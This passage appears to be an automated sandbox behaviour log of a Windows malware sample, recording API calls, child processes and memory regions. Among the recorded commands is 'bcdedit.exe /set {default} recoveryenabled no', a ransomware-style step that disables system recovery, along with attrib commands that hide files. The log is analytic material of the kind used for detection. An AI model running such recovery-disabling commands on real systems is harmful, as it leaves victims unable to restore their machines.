lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.099] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.100] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.135] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.135] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0195.135] _close (_FileHandle=3) returned 0 [0195.135] GetConsoleTitleW (in: lpConsoleTitle=0x2af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.135] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.136] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.138] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.138] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.138] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.138] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.138] GetConsoleTitleW (in: lpConsoleTitle=0x2af404, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.138] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af28c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af354 | out: lpAttributeList=0x2af28c, lpSize=0x2af354) returned 1 [0195.138] UpdateProcThreadAttribute (in: lpAttributeList=0x2af28c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af34c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af28c, lpPreviousValue=0x0) returned 1 [0195.139] GetStartupInfoW (in: lpStartupInfo=0x2af248 | out: lpStartupInfo=0x2af248*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.139] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.139] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af2e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af334 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" ", lpProcessInformation=0x2af334*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcc0, dwThreadId=0xb70)) returned 1 [0195.140] CloseHandle (hObject=0x50) returned 1 [0195.141] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.141] GetEnvironmentStringsW () returned 0x3f2c60* [0195.141] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.141] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0195.453] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af228 | out: lpExitCode=0x2af228*=0x0) returned 1 [0195.453] CloseHandle (hObject=0x4c) returned 1 [0195.453] _vsnwprintf (in: _Buffer=0x2af370, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af234 | out: _Buffer="00000000") returned 8 [0195.453] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.453] GetEnvironmentStringsW () returned 0x3f2c60* [0195.453] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.453] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.453] GetEnvironmentStringsW () returned 0x3f2c60* [0195.453] FreeEnvironmentStringsW (penv=0x3f2c60) returned 1 [0195.453] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af28c | out: lpAttributeList=0x2af28c) [0195.453] GetConsoleTitleW (in: lpConsoleTitle=0x2af670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.454] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0195.454] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0195.454] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0195.454] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.454] FindClose (in: hFindFile=0x3f0698 | out: hFindFile=0x3f0698) returned 1 [0195.454] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0195.454] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0195.454] GetConsoleTitleW (in: lpConsoleTitle=0x2af404, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0195.454] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af28c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af354 | out: lpAttributeList=0x2af28c, lpSize=0x2af354) returned 1 [0195.454] UpdateProcThreadAttribute (in: lpAttributeList=0x2af28c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af34c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af28c, lpPreviousValue=0x0) returned 1 [0195.454] GetStartupInfoW (in: lpStartupInfo=0x2af248 | out: lpStartupInfo=0x2af248*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0195.455] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0195.455] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af2e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af334 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\"", lpProcessInformation=0x2af334*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb6c, dwThreadId=0xc00)) returned 1 [0195.456] CloseHandle (hObject=0x4c) returned 1 [0195.456] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0195.456] GetEnvironmentStringsW () returned 0x3f3618* [0195.456] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.456] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0195.542] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af228 | out: lpExitCode=0x2af228*=0x0) returned 1 [0195.542] CloseHandle (hObject=0x50) returned 1 [0195.542] _vsnwprintf (in: _Buffer=0x2af370, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af234 | out: _Buffer="00000000") returned 8 [0195.542] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0195.542] GetEnvironmentStringsW () returned 0x3f3618* [0195.542] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.542] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0195.543] GetEnvironmentStringsW () returned 0x3f3618* [0195.543] FreeEnvironmentStringsW (penv=0x3f3618) returned 1 [0195.543] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af28c | out: lpAttributeList=0x2af28c) [0195.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.543] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0195.543] _get_osfhandle (_FileHandle=1) returned 0x7 [0195.543] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0195.543] _get_osfhandle (_FileHandle=0) returned 0x3 [0195.543] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0195.543] SetConsoleInputExeNameW () returned 0x1 [0195.543] GetConsoleOutputCP () returned 0x1b5 [0195.543] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0195.543] SetThreadUILanguage (LangId=0x0) returned 0x409 [0195.543] exit (_Code=0) Process: id = "445" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28655 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28656 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28657 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28658 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28659 start_va = 0xcb0000 end_va = 0xcb6fff entry_point = 0xcb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28660 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28661 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28662 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28663 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 28664 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28665 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28666 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28667 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28668 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 28669 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 28670 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28671 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28672 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28673 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28675 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28677 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28678 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28679 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28680 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28681 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28682 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28683 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28684 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 637 os_tid = 0xb74 Process: id = "446" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x7ea16ce0" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "bcdedit.exe /set {default} recoveryenabled no " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28685 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28686 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28687 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28688 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 28689 start_va = 0xa20000 end_va = 0xa69fff entry_point = 0xa20000 region_type = mapped_file name = "bcdedit.exe" filename = "\\Windows\\System32\\bcdedit.exe" (normalized: "c:\\windows\\system32\\bcdedit.exe") Region: id = 28690 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28691 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28692 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28693 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28694 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28695 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28696 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28697 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28698 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28699 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 28700 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28701 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28702 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28703 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28704 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28705 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28706 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 638 os_tid = 0xa3c Process: id = "447" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16180" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "444" os_parent_pid = "0xacc" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~2\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28729 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28730 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28731 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28732 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 28733 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28734 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28735 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28736 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28737 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28738 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28739 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28740 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28741 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 28742 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28743 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 28744 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28745 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28746 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28747 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28748 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28749 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28750 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28751 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28752 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28753 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28754 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 